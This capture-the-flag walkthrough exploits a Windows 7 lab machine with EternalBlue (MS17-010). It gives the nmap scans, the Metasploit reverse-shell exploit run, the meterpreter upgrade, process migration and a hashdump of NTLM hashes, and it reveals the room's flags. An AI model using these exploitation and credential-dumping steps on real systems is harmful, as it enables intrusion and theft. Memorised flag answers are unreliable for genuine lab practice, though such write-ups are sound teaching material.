Blue

This is actually one of my favorites rooms
It is a guided room initiation to eternal blue exploitation
Enumeration
nmap -sV -sC -vv 10.10.167.119 -Pn
...
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open ssl/ms-wbt-server? syn-ack
|_ssl-date: 2022-01-19T19:11:18+00:00; +2m40s from scanner time.
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-01-18T19:06:22
| Not valid after: 2022-07-20T19:06:22
| MD5: d1ce 8d03 42c7 c693 1938 3f46 1621 7542
| SHA-1: 5e1f d433 548c ed1c 21a7 60c4 69b9 07ca 2d16 e60f
| -----BEGIN CERTIFICATE-----
| MIIC0DCCAbigAwIBAgIQQ2xZBQI6xKlFTU4ur0ofEDANBgkqhkiG9w0BAQUFADAR
| MQ8wDQYDVQQDEwZKb24tUEMwHhcNMjIwMTE4MTkwNjIyWhcNMjIwNzIwMTkwNjIy
| WjARMQ8wDQYDVQQDEwZKb24tUEMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEK
| AoIBAQDOHu2yaPoA/thAcKBeS+704v6S/AWVU4IYYWHBhxC0GGDV4zdZs66A9HGi
| VO12ABWxI1EviOXEc1/hUXtbQ5mFuYAo8iyKM5onevEr2vjvDccaZD2c2tqOY/dY
| 4Os/pkst2xW+/PGwYQDxTTiqThplRWIffJr4Eku2kpCYNL9LA29MqHolaY6BGRSh
| drOVfEhNOHVVXqSU/Cubq7vfWQmU0lFOKl5hFy3qfJodCWfneGF5nB8e04IcQ1s9
| JXyWsDpTPQKUIGH4AAf5VJuKfru+EMZ1eonlqILyGXLuRyvFGC4aYI98rgCoioSV
| +7b7mXVhXwwVQ3crzt78vYj24SKTAgMBAAGjJDAiMBMGA1UdJQQMMAoGCCsGAQUF
| BwMBMAsGA1UdDwQEAwIEMDANBgkqhkiG9w0BAQUFAAOCAQEAxR+/GUndYpTXPQia
| j6ZVph748HvME0xnOom9+mIh1Jyqm8gFVKOUJq5fQISPGbxipQKjcojR+cuooL8b
| L/hGyhTXP89FR5q8Zx38bxgkKBNNGOMzZMKrwPU4ktbxgB05PgScSdT4uSSA16v2
| tmXCKYNPsd9ZYk/gV+uNkopg4zyD8p2GMhSgoq3NkkdYxhBREqMtFjWPh/nkZzOW
| UvH/JCJMtOZnAW+bI7C7LkfW+JyjDmcVKcyu95wnbXeNf/TN2avLpnqGJFfGwZA8
| quqCPP/y/cj/VMjkLKqg84HBdjHscA5Jofb9l5cTj4+cb9tiKgrwYMV01KnWfGed
| /lhz7Q==
|_-----END CERTIFICATE-----
49152/tcp open msrpc syn-ack Microsoft Windows RPC
49153/tcp open msrpc syn-ack Microsoft Windows RPC
49154/tcp open msrpc syn-ack Microsoft Windows RPC
49158/tcp open msrpc syn-ack Microsoft Windows RPC
49160/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51387/tcp): CLEAN (Couldn't connect)
| Check 2 (port 17757/tcp): CLEAN (Couldn't connect)
| Check 3 (port 43168/udp): CLEAN (Timeout)
| Check 4 (port 54355/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h32m40s, deviation: 3h00m00s, median: 2m39s
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:94:f0:59:6b:d5 (unknown)
| Names:
| JON-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| JON-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| Statistics:
| 02 94 f0 59 6b d5 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-19T13:11:05-06:00
| smb2-time:
| date: 2022-01-19T19:11:05
|_ start_date: 2022-01-19T19:06:21
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Look at those smb ports
open…
If you used --script vuln
option with nmap as suggested you get this
PORT STATE SERVICE REASON
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
3389/tcp open ms-wbt-server syn-ack
|_ssl-ccs-injection: No reply from server (TIMEOUT)
| rdp-vuln-ms12-020:
| VULNERABLE:
| MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0152
| Risk factor: Medium CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
| Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|
| Disclosure date: 2012-03-13
| References:
| http://technet.microsoft.com/en-us/security/bulletin/ms12-020
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|
| MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
| State: VULNERABLE
| IDs: CVE:CVE-2012-0002
| Risk factor: High CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
| Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|
| Disclosure date: 2012-03-13
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_ http://technet.microsoft.com/en-us/security/bulletin/ms12-020
49152/tcp open unknown syn-ack
49153/tcp open unknown syn-ack
49154/tcp open unknown syn-ack
49158/tcp open unknown syn-ack
49160/tcp open unknown syn-ack
Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
yeah, you can google ms17-010
and learn about eternalblue
Then fire up metasploit for easy access
you can search for eternalbue if you didnt find the metasploit path on google already
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
fill the options correctly and run/exploit
I suppose you already know metasploit so I wont insult you by showing all steps
For academic reasons we change the payload from automatic meterpreter to a simple shell
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[-] Handler failed to bind to 10.8.226.203:4444:- -
[*] Started reverse TCP handler on 0.0.0.0:4444
[*] 10.10.167.119:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.167.119:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.167.119:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.167.119:445 - The target is vulnerable.
[*] 10.10.167.119:445 - Connecting to target for exploitation.
[+] 10.10.167.119:445 - Connection established for exploitation.
[+] 10.10.167.119:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.167.119:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.167.119:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.167.119:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.167.119:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.167.119:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.167.119:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.167.119:445 - Sending all but last fragment of exploit packet
[*] 10.10.167.119:445 - Starting non-paged pool grooming
[+] 10.10.167.119:445 - Sending SMBv2 buffers
[+] 10.10.167.119:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.167.119:445 - Sending final SMBv2 buffers.
[*] 10.10.167.119:445 - Sending last fragment of exploit packet!
[*] 10.10.167.119:445 - Receiving response from exploit packet
[+] 10.10.167.119:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.167.119:445 - Sending egg to corrupted connection.
[*] 10.10.167.119:445 - Triggering free of corrupted buffer.
[-] 10.10.167.119:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.167.119:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.167.119:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.167.119:445 - Connecting to target for exploitation.
[+] 10.10.167.119:445 - Connection established for exploitation.
[+] 10.10.167.119:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.167.119:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.167.119:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.167.119:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.167.119:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.167.119:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.167.119:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.167.119:445 - Sending all but last fragment of exploit packet
[*] 10.10.167.119:445 - Starting non-paged pool grooming
[+] 10.10.167.119:445 - Sending SMBv2 buffers
[+] 10.10.167.119:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.167.119:445 - Sending final SMBv2 buffers.
[*] 10.10.167.119:445 - Sending last fragment of exploit packet!
[*] 10.10.167.119:445 - Receiving response from exploit packet
[+] 10.10.167.119:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.167.119:445 - Sending egg to corrupted connection.
[*] 10.10.167.119:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.0.2.2
[*] Command shell session 2 opened (10.0.2.15:4444 -> 10.0.2.2:49213) at 2022-01-19 20:35:21 +0100
[+] 10.10.167.119:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.167.119:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.167.119:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>
We are in!
Privilege escalation
background that session (note the number…2 for me) and use shell_to_meterpreter
for escalation
C:\Windows\system32>^Z
Background session 2? [y/N] y
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto detect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on.
msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 2
SESSION => 2
msf6 post(multi/manage/shell_to_meterpreter) > set LHOST 10.8.226.203
LHOST => 10.8.226.203
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[-] Handler failed to bind to 10.8.226.203:4433:- -
[*] Started reverse TCP handler on 0.0.0.0:4433
[-] Powershell is not installed on the target.
[*] Command stager progress: 1.66% (1699/102108 bytes)
[*] Command stager progress: 3.33% (3398/102108 bytes)
...
[*] Command stager progress: 98.15% (100216/102108 bytes)
[*] Command stager progress: 99.78% (101888/102108 bytes)
[*] Upgrading session ID: 2
[*] Starting exploit/multi/handler
[-] Handler failed to bind to 10.8.226.203:4433:- -
[*] Started reverse TCP handler on 0.0.0.0:4433
[*] Post module execution completed
msf6 post(multi/manage/shell_to_meterpreter) >
[*] Sending stage (175174 bytes) to 10.0.2.2
[*] Meterpreter session 3 opened (10.0.2.15:4433 -> 10.0.2.2:49224) at 2022-01-19 20:43:48 +0100
[*] Stopping exploit/multi/handler
I get my meterpreter on session 3
sessions 3
[*] Starting interaction with 3...
meterpreter > shell
Process 2060 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
Good! we got privileges! Let’s migrate to a better process
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
588 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
596 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.exe
644 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogon.exe
692 596 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\services.exe
700 596 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.exe
708 596 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
816 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
884 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
932 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1000 644 LogonUI.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\LogonUI.exe
1020 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
1068 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1160 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1324 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
1388 692 amazon-ssm-agent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
1464 692 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xentools\LiteAgent.exe
1604 692 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
1924 692 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\svchost.exe
1936 544 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
1956 816 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wbem\WmiPrvSE.exe
2060 2452 cmd.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\SysWOW64\cmd.exe
2064 816 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\wbem\WmiPrvSE.exe
2084 544 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
2244 3032 powershell.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
2252 2900 cmd.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\cmd.exe
2320 692 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost.exe
2344 692 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVICE C:\Windows\System32\sppsvc.exe
2452 2244 powershell.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
2456 692 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe
2548 692 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
2688 692 SearchIndexer.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchIndexer.exe
2900 692 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe
3028 544 conhost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\conhost.exe
3036 692 TrustedInstaller.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\TrustedInstaller.exe
meterpreter > migrate 2900
[*] Migrating from 2452 to 2900...
[*] Migration completed successfully.
post-exploitation
Its looting time! dump some information!
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
Cracking time!
Those are windows NTLM hashes! even crackstation get this done
alternatively we can use john or hashcat (mode 1000) with rockyou.txt
For flags just look in classic locations
The root…okay its not so classic but always check here
meterpreter > shell
Process 2648 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\
cd C:\
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\
03/17/2019 01:27 PM 24 flag1.txt
07/13/2009 09:20 PM <DIR> PerfLogs
04/12/2011 02:28 AM <DIR> Program Files
03/17/2019 04:28 PM <DIR> Program Files (x86)
12/12/2018 09:13 PM <DIR> Users
03/17/2019 04:36 PM <DIR> Windows
1 File(s) 24 bytes
5 Dir(s) 20,440,936,448 bytes free
C:\>type flag1.txt
type flag1.txt
flag{the_root_of_all_evil}
The SAM database store juicy info and passwords (it can be dumped too)
Its in system32 folder (config subfolder) so be cautious moving there
C:\Windows\System32\config>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Windows\System32\config
01/19/2022 01:06 PM <DIR> .
01/19/2022 01:06 PM <DIR> ..
12/12/2018 05:00 PM 28,672 BCD-Template
01/19/2022 01:16 PM 18,087,936 COMPONENTS
01/19/2022 01:39 PM 262,144 DEFAULT
03/17/2019 01:32 PM 34 flag2.txt
07/13/2009 08:34 PM <DIR> Journal
01/19/2022 01:35 PM <DIR> RegBack
03/17/2019 02:05 PM 262,144 SAM
01/19/2022 01:16 PM 262,144 SECURITY
01/19/2022 01:42 PM 40,632,320 SOFTWARE
01/19/2022 01:58 PM 12,582,912 SYSTEM
11/20/2010 08:41 PM <DIR> systemprofile
12/12/2018 05:03 PM <DIR> TxR
8 File(s) 72,118,306 bytes
6 Dir(s) 20,440,936,448 bytes free
C:\Windows\System32\config>type flag2.txt
type flag2.txt
flag{uncle_sam_is_your_friend}
And obviously…the Users folders
Flags are usually here in Desktop or Documents subfolders
C:\Users\Jon\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is E611-0B66
Directory of C:\Users\Jon\Documents
12/12/2018 09:49 PM <DIR> .
12/12/2018 09:49 PM <DIR> ..
03/17/2019 01:26 PM 37 flag3.txt
1 File(s) 37 bytes
2 Dir(s) 20,440,936,448 bytes free
C:\Users\Jon\Documents>type flag3.txt
type flag3.txt
flag{jon_is_the_administrator_here}
And its done! you pwn this machine and master eternablue
vulnerability!
I like the cool name (like shellshock and heartleed…cool vuln names)
you can read more about it and learn how it led to the wannacry
disater
